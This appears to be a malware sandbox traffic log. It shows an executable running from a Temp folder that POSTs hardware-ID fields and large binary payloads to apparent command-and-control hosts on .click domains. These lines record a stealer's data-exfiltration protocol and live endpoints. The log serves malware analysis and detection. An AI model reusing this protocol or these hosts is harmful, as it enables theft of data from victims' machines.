                                                                                                                                                                                                                                                              Data Ascii: --76C562P8LEContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--76C562P8LEContent-Disposition: form-data; name="pid"1--76C562P8LEContent-Disposition: form-data; name="lid"PsFKDg--pablo--76C562P8LEContent-
                                                                                                                                                                                                                                                              2024-12-22 01:19:05 UTC15331OUTData Raw: 92 1a 1c 7f fe 03 5c eb 7e 0b b7 98 18 d6 40 0f fd 75 90 55 1e ce 18 f8 94 dd c6 73 5d bb 71 61 df e6 31 81 e1 a4 ec df d6 5f 5e a1 19 52 43 27 2a 85 df d2 6c ee d3 4f 2f cc 44 75 8a 38 ae 7e 8a 26 ff fb f8 c1 eb 06 0e 3a 93 fc da c9 2f a4 62 c5 c5 9c 19 b2 4a 1c 1f 47 21 c7 88 aa 5f c7 b1 ee 8a 65 90 db d4 ef f8 35 08 24 78 44 45 aa 6f f5 7e 90 df 8a 5d df 38 83 ad 83 18 ac 51 2f f1 09 f1 0e 0b 5d 02 a2 22 fe 68 59 a2 f0 34 6e 68 6a 43 80 1c e2 db 6a ef 5a ad 68 f6 9a 58 d7 07 21 c4 74 27 79 1e ae c0 ce be 13 05 5f 6c 58 7e 62 85 ac 6f 5b bc b5 bd 1f 1d 0b c6 45 7e 6a 6e 57 ee 54 08 1e b2 57 14 25 e2 a5 c3 67 23 e2 62 cb c5 9e b0 ee b9 cd 34 aa 08 a9 92 1d d4 b2 58 c1 61 5a 0c 50 b3 94 5e 10 db be 2f 7e 47 40 bc 65 81 d4 4b f8 27 6b e4 31 50 47 80 ea ee
                                                                                                                                                                                                                                                              Data Ascii: \~@uUs]qa1_^RC'*lO/Du8~&:/bJG!_e5$xDEo~]8Q/]"hY4nhjCjZhX!t'y_lX~bo[E~jnWTW%g#b4XaZP^/~G@eK'k1PG
                                                                                                                                                                                                                                                              2024-12-22 01:19:05 UTC15331OUTData Raw: a5 36 5c 54 2a 49 10 4a 69 23 52 05 91 ea 7d e1 f3 f2 44 96 78 e6 87 de 80 a7 38 76 f3 14 f2 3e 17 4e 66 b8 89 56 cb f8 48 38 cb 37 26 7c 45 c6 ce 21 d4 e0 5f 65 67 91 1e c0 e9 1d 66 5e f0 f8 84 c7 20 6d f5 97 40 7c 81 c3 f7 7f 90 38 4d 1d b0 d0 1e 7f 16 7d 86 b9 af 80 bd bc f1 07 b0 2b 3e cd 79 99 f2 7f 94 f0 0b 35 8d 69 c0 ae 24 ed b5 cb 17 ff f9 bc 95 de f8 bf 9d 88 ff 27 db df 8a 0c 46 2f ab 91 86 3e 11 b7 ff c7 b2 ea 63 ee 1f 38 de 92 25 5f fd d3 2c fc cf a7 a4 9b 2f 5f 3d 26 d8 f4 c4 df 15 98 b6 ae 7e 5d 79 43 1a f6 49 69 8e ec 12 7d b6 ff 4d 40 bd 86 c8 74 0a 3d f4 fd 39 d2 58 f2 f9 ff d9 cf 5f 30 40 e3 d2 9e 75 a4 5e 69 71 a1 62 d4 75 ab b1 70 ba 8c 14 ea ef 70 b0 ba 53 23 e8 79 e8 bb 32 c4 17 6e f6 d1 89 83 d0 69 6c f7 90 63 45 1f 7d 8d 63 44 a8
                                                                                                                                                                                                                                                              Data Ascii: 6\T*IJi#R}Dx8v>NfVH87&|E!_egf^ m@|8M}+>y5i$'F/>c8%_,/_=&~]yCIi}M@t=9X_0@u^iqbuppS#y2nilcE}cD
                                                                                                                                                                                                                                                              2024-12-22 01:19:05 UTC710OUTData Raw: bf 8f d0 54 d9 c0 26 b6 aa 6d 73 c8 6f 4d ef 91 86 da 16 47 e3 6c 92 e6 07 53 db 33 bb 17 96 6d b9 3b c3 84 e2 b9 e4 09 c5 36 ca d3 39 87 9e 78 f9 dc 54 e7 12 cd d8 60 bc 68 26 33 de ee 4e 39 12 d2 b1 e3 46 50 11 94 c0 de 14 cf b3 6c d4 f7 c7 57 d1 72 2c 2d 4b b0 4e 68 f4 48 64 45 4e 1e fa 53 2f 80 89 19 81 5d 18 84 4d d1 36 68 33 8c 46 4b 84 d0 5a 5b b4 c8 84 6e 8b 20 d6 3c 9c 26 28 6b 57 ee 87 92 64 18 6a 19 86 2a 01 bb 35 f0 03 c2 e7 13 3b 49 4d 8d 8f 90 92 fa fe 2f 7c cb 0b 8c 2b fc 24 ca 93 96 42 ca 07 03 5d f0 8f f2 d7 dc 3c fa 5c de 85 90 00 79 cd 83 04 85 8d b4 eb b3 b3 55 f9 47 cf 73 90 d0 9c f8 a4 53 bc a6 6c 82 73 0d ab 8f 87 a2 f8 6a dd 00 e2 a3 79 6f 04 97 91 1d 17 c8 7b 47 52 77 a7 19 d6 b9 a5 4d d0 67 af d9 44 3b be ce 36 59 38 60 65 be 1d
                                                                                                                                                                                                                                                              Data Ascii: T&msoMGlS3m;69xT`h&3N9FPlWr,-KNhHdENS/]M6h3FKZ[n <&(kWdj*5;IM/|+$B]<\yUGsSlsjyo{GRwMgD;6Y8`e
                                                                                                                                                                                                                                                              2024-12-22 01:19:07 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:07 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=n4gmkq779o8vcnmovio4d2v1q1; expires=Wed, 16 Apr 2025 19:05:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFJEeWoPL5L9%2BY%2BaHr0M1hYGsXuoyfSaJjnIczXVZ0ECyh8Y9K2IAaRuLmGgeDxDP07SUXJ73QiFLsrynwqybzhVaIEA3wOrvOXI6aSGvvHKA5LmeThv5Z3v2YT1rBW7qw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c481f6a2b8c33-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2562&min_rtt=2107&rtt_var=1115&sent=31&recv=52&lost=0&retrans=0&sent_bytes=2833&recv_bytes=47743&delivery_rate=1385856&cwnd=245&unsent_bytes=0&cid=e18e63c8cd40f38d&ts=1492&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:19:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:19:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              67192.168.2.450284104.21.89.1154437796C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=B81801Z0B83NBVBFH
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 312218
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: 2d 2d 42 38 31 38 30 31 5a 30 42 38 33 4e 42 56 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 38 31 38 30 31 5a 30 42 38 33 4e 42 56 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 38 31 38 30 31 5a 30 42 38 33 4e 42 56 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 42 38 31 38
                                                                                                                                                                                                                                                              Data Ascii: --B81801Z0B83NBVBFHContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--B81801Z0B83NBVBFHContent-Disposition: form-data; name="pid"1--B81801Z0B83NBVBFHContent-Disposition: form-data; name="lid"PvbArZ----B818
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: 4a bf ed eb 5f 93 12 03 bc 6d 50 7a 28 d2 ac 16 b1 3c 9a f4 f6 aa 06 51 d4 ba 0f 53 f5 7d 77 69 85 6f d1 da e1 88 06 5b 6f d7 51 87 2d ba 88 21 e5 46 4c 99 d0 16 e0 a2 55 ae b6 7a 7e 40 9a f7 76 a5 38 99 e5 d4 55 e3 28 b9 e9 88 b0 58 44 5c 9c 11 06 38 95 40 b0 d9 ec 46 0f 3e 3b 99 34 44 7a 11 e7 16 9b 11 b1 a2 56 e8 f1 35 40 39 d4 8a 14 fe c1 ed 21 77 57 56 ba 86 90 c3 50 ad 9c fc bc c7 cb 7a 95 3b 8e f2 57 3d 87 95 55 81 8d 56 01 7e 10 02 ea b7 42 db c3 87 c5 86 d7 ae 55 37 32 fc 99 18 a5 cb 20 fb 7c 34 bb 68 45 ae ee b0 1e b3 9e 7f 54 fe fe c1 46 92 30 d7 12 cd e3 6e 76 f0 56 a7 f1 d8 6e a8 f1 87 83 28 98 91 3c e7 80 26 17 cb 13 d7 70 7d e5 cf c6 71 6b 0d 30 b3 80 13 bf f5 01 f7 87 60 1c 8c 01 64 b5 1c 53 f4 f2 06 fe 73 48 b9 21 7b 02 b0 ad 3f 94 ba ca
                                                                                                                                                                                                                                                              Data Ascii: J_mPz(<QS}wio[oQ-!FLUz~@v8U(XD\8@F>;4DzV5@9!wWVPz;W=UV~BU72 |4hETF0nvVn(<&p}qk0`dSsH!{?
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: 58 b2 27 44 65 c2 e8 5e 7f 8c 3b 59 bb a6 12 78 ea 1a 70 54 fe c1 fe 98 7c 48 ba 1a c4 22 27 57 5b f4 fd 64 6e 51 2c aa a7 21 2b 8f 37 71 0e 1f e8 53 cf 4c 22 14 d9 27 ea 59 bc 57 98 e7 05 46 15 e1 cb 82 f7 1f 16 65 42 c7 76 ac c7 4c 38 f1 8f 87 f3 95 85 6b d2 a5 ea a1 3e 0e 0e 0d 6f 27 12 f8 d2 7a 18 23 16 82 75 34 c8 1c d6 43 93 a1 d0 88 d1 3d 23 d0 49 10 42 5c 14 85 08 f7 dc 61 f8 1a c8 05 3d 81 8a d3 16 5f 39 06 f3 e0 c4 30 73 03 f7 f2 6f 55 ef 4c f4 7c 84 82 19 c0 36 bc e2 04 06 ec 4b f8 c6 00 0c 64 1b 03 df f8 66 ac 4a 3e 30 3e 38 ea e3 02 b4 f8 a5 4f 4f ae d3 17 2a 7a 7a e3 ef 1b 6d 56 f5 0f bb 1b 6b 79 dc 73 62 8d 64 55 e4 7f a7 6a 29 83 5f 1a 48 e4 1d 78 86 1b 0d 45 b5 e7 2d 4b e8 5b 1e 97 ae ef 98 e1 82 c3 35 81 a8 e3 1b 9c 1b 05 cc c0 eb f7 00
                                                                                                                                                                                                                                                              Data Ascii: X'De^;YxpT|H"'W[dnQ,!+7qSL"'YWFeBvL8k>o'z#u4C=#IB\a=_90soUL|6KdfJ>0>8OO*zzmVkysbdUj)_HxE-K[5
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: 64 dc e7 6e cb f6 05 83 a8 c6 d0 50 17 56 51 e9 0e a0 e7 3f bb 5c 92 67 5a 28 08 d6 61 42 3b cf ce 5e c6 c8 86 bc 2a 16 39 06 c4 74 9e 32 56 ae 57 ce 02 2a bf 93 d7 1a 60 00 88 b6 c0 f2 d5 93 97 44 60 39 59 06 59 91 80 af 40 f0 10 d3 dd 53 a4 0c 4f 77 a6 b5 1f 66 b7 85 3c 37 da 9b b5 58 97 07 33 b5 c2 4d 86 52 2a 16 97 64 51 de 47 c5 d6 82 eb df 8f 85 ba ec be cc c7 0f 8b bd 1b 4f 78 7e a3 89 f2 93 bb ec ec be 44 26 e0 fc 50 11 96 1c ea 1d 67 64 1d 7c 77 d8 44 99 b0 31 5f 7f 0c c5 ad f5 48 bd 58 8d d3 3e 2d ba 42 28 f7 53 e1 b5 35 c3 29 61 c3 a9 99 4e 24 43 c8 59 43 41 71 f1 c3 17 dd 23 54 d6 44 c6 6c 81 d7 38 e6 a3 85 19 93 bd 14 1d 0d 35 90 3d a0 ef c5 c0 0d 0c 56 53 97 d2 52 07 23 00 74 64 90 24 70 5f f1 1f a9 9b 1f 17 bc 26 80 cd 18 a6 36 60 4d 2d 1b
                                                                                                                                                                                                                                                              Data Ascii: dnPVQ?\gZ(aB;^*9t2VW*`D`9YY@SOwf<7X3MR*dQGOx~D&Pgd|wD1_HX>-B(S5)aN$CYCAq#TDl85=VSR#td$p_&6`M-
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: da 25 7e 92 82 e3 c6 d2 3d 4d 3d 88 0f f3 66 d1 e9 f2 cc ed 39 a0 d9 c1 d1 2f f6 48 bb 9d d8 60 21 40 d2 dc 6b 64 d7 de 21 93 2a 82 7f 06 20 b5 98 22 2c cb a5 54 f3 16 cc 27 45 b3 6d 07 f8 01 86 66 66 9e 99 a6 51 3a f7 ed 22 6c e5 e9 1d f2 9f 64 a7 15 ff 54 b5 eb 1a 93 4e 63 27 d2 9e 5a 08 80 dc eb dd ef a5 37 8e b2 22 92 32 30 da e6 11 43 73 21 7c f3 1f 5e 4a b9 ea 22 bd 2c b6 52 ae 0e fd 96 a6 69 a9 17 69 28 ed eb bc f5 1b ca 22 79 9c ab ea b1 2b b2 4e b3 6e e5 97 a5 53 b0 e2 5a ff f3 23 75 bf 67 58 cd e7 94 1a d2 ef d5 9f 06 09 70 f1 e1 c8 a4 74 3a 42 cc be c8 aa eb e8 8d 1c 84 67 d5 d9 35 57 92 98 5e 59 ae 07 b2 58 b0 5b 8a 0a c9 1a f0 80 31 48 ce 36 95 17 11 3e fc 5c 0c ea 0c 2a d4 07 7a 26 87 87 e5 75 6e 9c 49 79 fc 89 7f 56 79 ac 37 36 66 be 65 46
                                                                                                                                                                                                                                                              Data Ascii: %~=M=f9/H`!@kd!* ",T'EmffQ:"ldTNc'Z7"20Cs!|^J",Rii("y+NnSZ#ugXpt:Bg5W^YX[1H6>\*z&unIyVy76feF
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: 73 38 3f 6a a8 1e 4b de 13 f6 29 bd 58 5b 82 29 93 62 fc b4 1e b4 f4 1d fa 62 56 c4 8b 8b 99 d3 ad f5 60 c9 07 19 e4 7a de 81 73 5a ff 44 24 4d 4f 06 77 03 0e 28 8e f0 fc 65 33 82 1d 95 85 9a 46 78 cd 60 21 6e 00 e3 34 03 7d 03 2f 03 24 cc a3 81 21 30 e2 09 8b 80 7d f4 5b c1 11 ee d1 b7 c6 09 b9 eb ef d7 11 e3 a6 10 bb 62 26 7a 3a de ef b1 50 52 95 49 cb 54 ee 2f ea 08 0a 85 7d 71 38 9e 25 e4 6e a8 b7 8c 59 18 3d 11 7a 1d ed 56 5e f4 8b 2f 8b 78 a7 f7 5b 6f ad c3 1e 01 9c 75 73 a9 72 5c 11 4f db ff af dc ca 55 1b 32 3a fb a1 35 64 17 fd e1 9a 58 f3 f5 ec 4b 16 46 b6 3e a2 6c d7 7a 65 73 ed 44 d6 8f d3 1f 56 52 be d1 09 97 56 dc 3c 0e 2e 75 8a b2 4a fa ec b4 7c 06 04 f6 fb af cd ad c8 ff ee 09 cc b8 a4 91 f4 fa b5 16 f5 1d 35 f9 30 ee 72 67 7b b0 e4 06 05
                                                                                                                                                                                                                                                              Data Ascii: s8?jK)X[)bbV`zsZD$MOw(e3Fx`!n4}/$!0}[b&z:PRIT/}q8%nY=zV^/x[ousr\OU2:5dXKF>lzesDVRV<.uJ|50rg{
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: 7c 01 ef 42 17 4f 04 3f 67 a7 f4 b0 32 d7 ce 32 eb a0 89 ac 62 95 01 2b 51 fa 27 f0 6e 16 ba 29 d4 be 5d 52 65 78 4a 70 5f a7 e7 d7 22 52 b8 b1 9c 48 54 d5 57 38 9d 78 22 8a c2 56 eb f8 21 33 d8 8d 4e ba 7f a7 78 8f 60 cf d6 b2 3c ee d1 18 97 b8 a7 4c 44 49 da 88 69 4f 7b 3e d0 bc 03 57 86 06 b1 8b 6b fb b6 0b 32 c3 5b 75 3f 13 5f fa 29 10 41 5a 1c ca 75 87 e5 12 d4 1f 73 87 12 0b aa 1c 44 3d 1f c7 f2 b8 ec a6 bc 66 b4 8a 66 ab 56 ec eb 75 be 1c c3 2b 98 c8 ab 58 dd e8 2d f9 55 64 49 1c 20 38 0a 82 59 44 9c 2a 19 0a 4f 9f 4f 0d 83 09 f1 a8 2e a9 6e c6 66 9e 77 ea fa d1 0a 23 4c f3 3a 0d cf 7b 40 eb 8b 13 c4 6c 5e 27 fc da 32 c0 49 99 5c 4b f9 37 0c f1 75 18 94 54 e9 5a ed 1f 22 80 9c 9e d0 69 b9 e8 b6 0a 7f 1b d2 e0 0f 6a 46 f7 f3 d5 c6 94 b9 da 86 c9 3b
                                                                                                                                                                                                                                                              Data Ascii: |BO?g22b+Q'n)]RexJp_"RHTW8x"V!3Nx`<LDIiO{>Wk2[u?_)AZusD=ffVu+X-UdI 8YD*OO.nfw#L:{@l^'2I\K7uTZ"ijF;
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: a9 9b d8 1f 2f a2 8f 20 c6 34 3a b6 b9 21 6b 8c c8 47 01 62 f9 f2 aa 45 5f aa 6c 08 72 35 5d c4 c6 96 0e 71 c5 41 e0 db 0a 07 ed 3c 65 e8 ce 7c 93 68 c2 fd 0f 88 5c 37 29 e0 8c b2 f9 45 0b 39 24 88 c7 80 2c 75 a6 de e8 58 1c 28 7d ce 70 02 59 b7 99 b4 90 b3 70 4b 66 5c 6d e7 0b 98 dc 4c a7 9a 43 81 97 99 f1 08 80 c1 3f 1a 9d 73 1a 12 a3 d5 1b ac 7f 60 96 2c 8c b5 36 dd d3 2c df cf dd 75 2e ea 3f 32 67 37 02 f3 e9 6f fb 73 01 44 6e f0 eb 33 e5 93 f9 27 9c 3c d4 7f f7 7a 55 dd 21 94 19 0c 39 be 9a 69 e4 bd 71 d6 b6 64 51 e6 52 fb be e2 2d a6 f1 06 cb 2e 79 8f 1c a9 86 62 6f fe 6a ac 2f cb f8 0d 5e 6e 51 34 cb 91 45 bd 62 e8 a5 8e 3c 40 82 8b 46 5d 9c a5 d6 53 c0 f2 f7 6a ed ee cb fe 83 34 8d 76 ad c7 b6 85 51 ff 50 ab 6b 0b ad 52 06 07 1e 5f 9e b2 fa 8c 8d
                                                                                                                                                                                                                                                              Data Ascii: / 4:!kGbE_lr5]qA<e|h\7)E9$,uX(}pYpKf\mLC?s`,6,u.?2g7osDn3'<zU!9iqdQR-.yboj/^nQ4Eb<@F]Sj4vQPkR_
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: a8 65 ba 42 bc 14 05 fb f2 f1 a1 d4 25 a5 63 e4 0c a8 1d 25 7f 48 81 8e 98 35 1b 61 8d 97 20 47 95 c9 78 d2 a9 65 2d ed 1d 24 fe fa eb 0f 61 8d 3d d3 2f 09 da 93 e1 73 ff 85 fc 36 09 67 62 0e a2 40 c9 16 6a b1 9b e4 43 6e 4f ae 0c c8 33 04 6d 4b 00 b2 88 ef f5 a7 dd 33 d5 1d 2e cb e7 28 37 06 cb 8c 03 51 a0 c5 7d 42 23 fd f5 12 d4 f3 20 a3 84 32 ed 9c 7b 8f 34 28 69 19 a8 2d db 34 70 bf 71 87 50 02 7e e5 09 cc 65 a8 a1 49 79 21 9d 25 dd 4a e4 e7 5e a6 c8 57 b3 ae 1e 0e a5 5b b6 50 83 1e 45 05 32 3f d5 85 bc ba b3 9c ed b7 f4 70 cf 28 e0 2f 7c 57 07 3b a9 9f 6f 9f 3f a6 b0 aa cf 60 20 29 29 ab d9 43 0f c2 83 43 a5 95 3f b6 ad e4 89 41 86 02 7c 43 65 1b 07 37 10 d1 ce 50 b9 16 3a 28 6d f7 da 6d ef bb 63 92 55 12 2b d3 59 37 74 82 2d 0b 76 45 c3 61 29 d2 ab
                                                                                                                                                                                                                                                              Data Ascii: eB%c%H5a Gxe-$a=/s6gb@jCnO3mK3.(7Q}B# 2{4(i-4pqP~eIy!%J^W[PE2?p(/|W;o?` ))CC?A|Ce7P:(mmcU+Y7t-vEa)
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: 7b c9 31 37 2b a8 ac 35 23 d0 88 9d 1e 7f f2 8f db e6 4f f1 4b ca de 76 dc b3 37 3f 0c 9a 6f 3d ba 8b 62 ed 7d 46 56 02 5f c8 6e 63 d9 54 e4 6b 67 ac 1b 78 b2 20 95 9a da 37 1e e1 e6 f8 aa ef d7 87 2d 0f 7f 34 76 08 86 3f 7e 51 3a 0a ce 44 67 6d e1 2e 0b af 33 3a 82 79 ec 34 43 bf 84 83 4f da 4a c0 ab ea 2e 22 d2 49 32 b9 d5 c7 39 68 01 33 2d ee 4f 74 bb 34 25 c1 6f 9a ed f9 47 bd a3 78 b1 ca fc cc 4d ab 7a ee d1 49 57 e5 32 f2 b2 76 0c 09 d0 aa d7 22 96 41 53 8d 3a d8 f9 fd fd 86 c5 f0 4c fb 62 b8 74 f1 6d ce fe d1 4a 09 f1 2b 0e 1d fc 9b ba c1 2f 91 22 ac 1f b0 79 92 67 3e ca f4 c3 91 fc 44 9f 0b f8 65 4b 0b 45 4e df 0b 13 e1 95 59 1b 54 9b 9b ce d4 aa 6e 14 68 01 f9 20 d1 a7 9e e7 21 40 bb 50 b4 a2 e7 4b 4b a9 12 ed ac e8 b3 b6 f7 99 72 6b 4f d1 d5 32
                                                                                                                                                                                                                                                              Data Ascii: {17+5#OKv7?o=b}FV_ncTkgx 7-4v?~Q:Dgm.3:y4COJ."I29h3-Ot4%oGxMzIW2v"AS:LbtmJ+/"yg>DeKENYTnh !@PKKrkO2
                                                                                                                                                                                                                                                              2024-12-22 01:19:11 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=b8d10pcav4oj5mvqdhkv3tvam0; expires=Wed, 16 Apr 2025 19:05:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5YY%2B5vZ7uOCdXbkVruFY%2FzfOsbWWqBV881rTxY5h1RbzH3SJfvVFO9TuMuvfXnrjMVN7S7RoA4wqlWwC36TOxcqKsE1vgNtpVZoPQVKjKE2kd5DHft3o7wcRssK2QKYGchU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c482e9f8e8c4b-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1781&rtt_var=692&sent=170&recv=327&lost=0&retrans=0&sent_bytes=2838&recv_bytes=314016&delivery_rate=1554845&cwnd=232&unsent_bytes=0&cid=b3e2d05bc126161e&ts=3188&x=0"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              68192.168.2.450286104.21.67.146443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC368OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=XT16VUTYUIO64
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20410
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC15331OUTData Raw: 2d 2d 58 54 31 36 56 55 54 59 55 49 4f 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 54 31 36 56 55 54 59 55 49 4f 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 54 31 36 56 55 54 59 55 49 4f 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 58 54 31 36 56 55 54 59
                                                                                                                                                                                                                                                              Data Ascii: --XT16VUTYUIO64Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--XT16VUTYUIO64Content-Disposition: form-data; name="pid"3--XT16VUTYUIO64Content-Disposition: form-data; name="lid"CZJvss--geopoxid--XT16VUTY
                                                                                                                                                                                                                                                              2024-12-22 01:19:08 UTC5079OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO
